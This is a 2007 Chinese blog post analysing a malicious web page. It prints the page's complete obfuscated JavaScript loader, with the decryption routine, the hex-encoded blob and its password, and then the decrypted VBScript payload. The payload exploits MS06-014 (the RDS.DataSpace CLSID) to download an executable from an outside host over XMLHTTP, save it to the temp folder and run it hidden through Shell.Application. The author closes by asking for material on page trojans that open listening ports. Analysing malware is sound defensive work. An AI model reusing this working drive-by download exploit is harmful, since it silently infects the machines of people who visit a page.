今天有兴趣,看了网页木马真面目

    今天一个网站,忽然防火墙就提示有网页木马。恼火,决定看一下到底利用了什么漏洞?
首先记下网页地址:http://evilman.cn/1.htm
    先关掉所有浏览器,然后关闭防火墙, 打开记事本,CTRL+O,打开这个网页,看到如下源码:
<SCRIPT LANGUAGE="JavaScript">
<!--
function decrypt(str, pwd) {
 
if(str == null || str.length < 8{
 alert(
"A salt value could not be extracted from the encrypted message because it's length is too short. The message cannot be decrypted.");
 
return;
 }

 
if(pwd == null || pwd.length <= 0{
 alert(
"Please enter a password with which to decrypt the message.");
 
return;
 }

 
var prand = "";
 
for(var i=0; i<pwd.length; i++{
 prand 
+= pwd.charCodeAt(i).toString();
 }

 
var sPos = Math.floor(prand.length / 5);
 
var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos*2+ prand.charAt(sPos*3+ prand.charAt(sPos*4+ prand.charAt(sPos*5));
 
var incr = Math.round(pwd.length / 2);
 
var modu = Math.pow(231- 1;
 
var salt = parseInt(str.substring(str.length - 8, str.length), 16);
 str 
= str.substring(0, str.length - 8);
 prand 
+= salt;
 
while(prand.length > 10{
 prand 
= (parseInt(prand.substring(010)) + parseInt(prand.substring(10, prand.length))).toString();
 }

 prand 
= (mult * prand + incr) % modu;
 
var enc_chr = "";
 
var enc_str = "";
 
for(var i=0; i<str.length; i+=2{
 enc_chr 
= parseInt(parseInt(str.substring(i, i+2), 16^ Math.floor((prand / modu) * 255));
 enc_str 
+= String.fromCharCode(enc_chr);
 prand 
= (mult * prand + incr) % modu;
 }

 
return enc_str;
}

dl 
= "http://evilman.cn/mm.exe"
var WangLuoQianJu="\x46\x38\x44\x32\x42\x46\x35\x44\x32\x34\x41\x32\x35\x41\x42\x34\x46\x36\x33\x37\x32\x43\x42\x33\x42\x30\x43\x33\x34\x43\x32\x41\x35\x46\x37\x33\x30\x39\x32\x38\x32\x33\x46\x45\x39\x30\x42\x34\x33\x34\x33\x38\x39\x37\x30\x34\x38\x38\x39\x36\x35\x36\x45\x30\x39\x35\x33\x42\x41\x31\x34\x32\x43\x45\x45\x42\x37\x39\x38\x35\x32\x30\x44\x42\x35\x31\x31\x31\x42\x33\x31\x32\x44\x43\x37\x38\x42\x46\x32\x36\x44\x36\x45\x45\x46\x37\x44\x35\x39\x41\x45\x41\x35\x30\x35\x34\x43\x37\x32\x44\x33\x31\x36\x37\x38\x37\x33\x33\x30\x30\x35\x41\x44\x46\x30\x44\x41\x31\x35\x38\x32\x39\x43\x34\x44\x32\x32\x44\x31\x42\x33\x42\x45\x36\x45\x31\x34\x38\x36\x37\x38\x41\x34\x34\x31\x33\x37\x46\x38\x38\x42\x30\x35\x31\x46\x44\x38\x41\x37\x39\x33\x31\x43\x34\x42\x33\x44\x38\x37\x31\x38\x31\x45\x43\x35\x32\x39\x44\x34\x35\x37\x42\x30\x36\x44\x42\x31\x44\x30\x33\x41\x46\x34\x45\x34\x34\x38\x38\x30\x31\x45\x33\x35\x42\x31\x41\x30\x46\x37\x37\x37\x37\x31\x42\x42\x31\x46\x36\x33\x39\x46\x41\x33\x42\x39\x44\x32\x44\x31\x46\x38\x46\x39\x30\x34\x44\x43\x31\x32\x46\x45\x39\x38\x37\x35\x35\x37\x33\x41\x35\x35\x43\x30\x42\x30\x33\x39\x34\x43\x39\x44\x33\x31\x30\x46\x30\x37\x33\x42\x46\x38\x41\x31\x32\x35\x32\x46\x37\x44\x36\x36\x44\x33\x33\x39\x43\x34\x33\x46\x45\x43\x33\x41\x33\x34\x41\x32\x35\x30\x45\x46\x46\x38\x30\x45\x31\x31\x34\x39\x30\x41\x42\x45\x31\x33\x31\x31\x35\x39\x36\x45\x36\x30\x42\x41\x43\x34\x32\x42\x41\x32\x33\x38\x42\x36\x41\x43\x44\x33\x37\x35\x38\x42\x31\x31\x37\x38\x42\x30\x44\x36\x46\x30\x32\x35\x45\x32\x35\x36\x44\x46\x32\x45\x35\x32\x46\x33\x31\x39\x32\x42\x30\x37\x41\x33\x31\x39\x42\x33\x36\x42\x38\x31\x44\x37\x34\x32\x39\x37\x36\x35\x45\x43\x32\x34\x38\x35\x32\x39\x39\x36\x31\x37\x30\x41\x44\x31\x33\x37\x37\x39\x45\x32\x36\x41\x43\x38\x38\x41\x36\x35\x42\x45\x42\x41\x34\x44\x31\x43\x38\x35\x30\x32\x33\x34\x36\x33\x45\x33\x41\x30\x38\x46\x41\x37\x31\x30\x34\x44\x43\x36\x39\x34\x44\x30\x41\x36\x35\x36\x33\x36\x32\x45\x41\x41\x43\x41\x34\x41\x31\x41\x41\x37\x33\x45\x43\x34\x43\x42\x43\x34\x32\x38\x36\x43\x31\x36\x41\x31\x45\x35\x32\x33\x37\x39\x37\x46\x41\x31\x35\x41\x34\x43\x34\x46\x33\x37\x42\x39\x33\x43\x37\x39\x30\x39\x46\x41\x37\x30\x38\x44\x30\x35\x39\x45\x32\x35\x33\x32\x44\x44\x34\x44\x30\x38\x34\x44\x43\x37\x45\x31\x30\x45\x46\x32\x31\x31\x45\x31\x43\x41\x39\x45\x43\x46\x36\x39\x32\x43\x41\x36\x32\x32\x34\x35\x45\x34\x45\x36\x43\x41\x39\x31\x43\x42\x33\x43\x44\x42\x34\x37\x33\x42\x33\x46\x33\x36\x36\x36\x42\x45\x38\x35\x36\x32\x32\x36\x46\x45\x30\x35\x41\x45\x41\x46\x45\x43\x30\x33\x45\x37\x41\x30\x34\x46\x35\x36\x43\x36\x42\x44\x36\x41\x38\x35\x30\x44\x46\x33\x34\x41\x36\x35\x38\x32\x34\x33\x36\x30\x46\x39\x32\x35\x30\x32\x41\x44\x34\x31\x34\x32\x38\x31\x45\x30\x33\x44\x45\x33\x33\x44\x43\x35\x43\x43\x36\x42\x35\x46\x33\x32\x46\x37\x30\x34\x35\x35\x37\x44\x42\x46\x32\x32\x37\x35\x42\x30\x42\x34\x43\x37\x43\x35\x39\x37\x46\x36\x41\x45\x42\x38\x42\x45\x42\x30\x46\x42\x34\x33\x37\x38\x38\x32\x32\x34\x45\x39\x32\x46\x43\x46\x35\x43\x37\x42\x35\x42\x30\x43\x39\x33\x42\x30\x36\x38\x32\x41\x32\x39\x36\x31\x30\x39\x34\x33\x44\x35\x32\x30\x46\x38\x32\x30\x30\x45\x46\x41\x38\x38\x44\x43\x37\x39\x42\x36\x41\x33\x31\x44\x35\x36\x30\x31\x30\x41\x39\x42\x46\x41\x37\x45\x36\x38\x37\x33\x30\x34\x37\x39\x45\x41\x44\x45\x31\x34\x46\x36\x32\x36\x41\x41\x34\x34\x34\x45\x46\x36\x36\x44\x39\x39\x35\x39\x31\x31\x41\x31\x38\x32\x44\x38\x31\x45\x30\x39\x36\x31\x34\x44\x44\x30\x39\x44\x45\x31\x30\x43\x35\x45\x30\x36\x38\x43\x30\x34\x32\x31\x33\x46\x35\x45\x45\x44\x44\x36\x39\x32\x36\x34\x37\x44\x41\x35\x37\x45\x41\x37\x42\x37\x41\x43\x45\x36\x38\x31\x42\x43\x41\x41\x34\x45\x37\x46\x45\x45\x44\x33\x41\x34\x35\x38\x46\x32\x38\x43\x31\x31\x34\x45\x39\x39\x39\x34\x34\x34\x43\x32\x33\x39\x33\x41\x38\x33\x45\x32\x34\x39\x41\x37\x33\x33\x39\x32\x34\x39\x39\x46\x37\x31\x35\x46\x38\x43\x30\x33\x39\x45\x33\x41\x33\x32\x39\x31\x41\x45\x31\x36\x41\x31\x34\x46\x32\x32\x30\x42\x34\x44\x34\x31\x38\x30\x38\x43\x38\x35\x32\x41\x34\x41\x35\x44\x42\x44\x45\x45\x32\x43\x44\x41\x41\x30\x39\x44\x30\x37\x44\x32\x44\x30\x46\x46\x44\x34\x39\x36\x41\x35\x33\x36\x37\x39\x37\x35\x46\x34\x30\x31\x42\x39\x33\x33\x32\x30\x37\x34\x37\x39\x35\x43\x41\x43\x41\x44\x34\x38\x46\x38\x35\x41\x31\x33\x37\x33\x42\x41\x38\x33\x44\x38\x34\x30\x39\x46\x39\x44\x41\x44\x41\x42\x38\x37\x37\x43\x44\x37\x44\x33\x42\x34\x35\x42\x36\x32\x41\x30\x30\x45\x32\x42\x37\x34\x42\x39\x42\x33\x39\x43\x32\x39\x38\x39\x38\x43\x38\x42\x39\x34\x38\x31\x33\x43\x42\x45\x43\x43\x41\x43\x37\x36\x38\x42\x44\x31\x43\x39\x41\x45\x31\x33\x42\x43\x45\x36\x44\x39\x44\x35\x32\x34\x39\x36\x45\x33\x42\x37\x38\x46\x35\x44\x35\x41\x30\x45\x32\x30\x43\x45\x33\x31\x46\x36\x44\x33\x46\x33\x41\x43\x46\x35\x30\x33\x30\x37\x43\x34\x44\x44\x44\x42\x30\x38\x34\x39\x32\x38\x37\x39\x31\x39\x42\x33\x35\x41\x32\x46\x43\x36\x46\x38\x41\x33\x45\x33\x37\x46\x34\x36\x45\x30\x44\x31\x41\x39\x31\x44\x44\x32\x35\x44\x43\x34\x45\x36\x37\x46\x46\x38\x42\x30\x34\x41\x35\x38\x45\x30\x35\x46\x45\x45\x30\x41\x46\x39\x32\x30\x30\x41\x30\x45\x38\x35\x35\x41\x45\x38\x46\x33\x30\x37\x39\x46\x43\x31\x30\x44\x32\x34\x46\x43\x45\x32\x38\x36\x37\x34\x45\x44\x43\x32\x42\x46\x41\x42\x34\x35\x46\x31\x41\x32\x45\x31\x38\x35\x30\x44\x32\x38\x44\x46\x30\x36\x44\x36\x36\x42\x42\x36\x43\x43\x33\x39\x46\x35\x36\x37\x41\x35\x41\x46\x43\x42\x46\x31\x34\x42\x37\x39\x30\x34\x34\x34\x34\x35\x43\x42\x30\x34\x36\x38\x43\x45\x42\x34\x35\x38\x44\x42\x41\x42\x39\x36\x34\x39\x33\x38\x35\x38\x33\x38\x31\x43\x44\x38\x35\x31\x37\x39\x35\x39\x42\x34\x43\x42\x30\x35\x46\x33\x37\x33\x41\x33\x42\x30\x33\x44\x42\x36\x36\x46\x41"
document.write(decrypt(WangLuoQianJu,
"3800"))
//-->
</SCRIPT>

      有一段加密的函数,不过已经给出了解密算法和密码,我们修改下,然后看一下这段加密的东西到底是什么脚本:
     修改最后的
  
.

document.write(decrypt(WangLuoQianJu,"3800"))
//-->
</SCRIPT>

更改为:


//-->
</SCRIPT>
<textarea id="tbSrc" style="width:100%;height:300px">
</textarea>

<script type="text/javascript">
document.getElementById(
"tbSrc").value = decrypt(WangLuoQianJu,"3800");

</script>
    然后运行一下:我们在文本框中看到真实的病毒脚本:
<script language="VBScript">
on error resume next
Set df = document.createElement("object")
df.setAttribute 
"classid""clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str
="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1
="Ado"
a2
="db."
a3
="Str"
a4
="eam"
str1
=a1&a2&a3&a4
str5
=str1
set S = df.createobject(str5,"")
S.type 
= 1
str6
="GET"
x.Open str6, dl, 
False
x.Send
fname1
="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2
fname1
= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,
2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,
"","","open",0
</script>
      看到了clsid:BD96C556-65A3-11D0-983A-00C04FC29E36吧,原来是MS06-014: msadco.dll 严重漏洞
后面还利用了XMLHTTP来下载木马,用FileSystemObject来保存文件,用Shell.Application来运行木马。

    真像大白,我一直想知道那个利用网页,直接开端口监听的网页木马是如何做的,谁给告诉我点资料呀?
posted @ 2007-07-08 19:47  阿牛  阅读(1057)  评论(1编辑  收藏  举报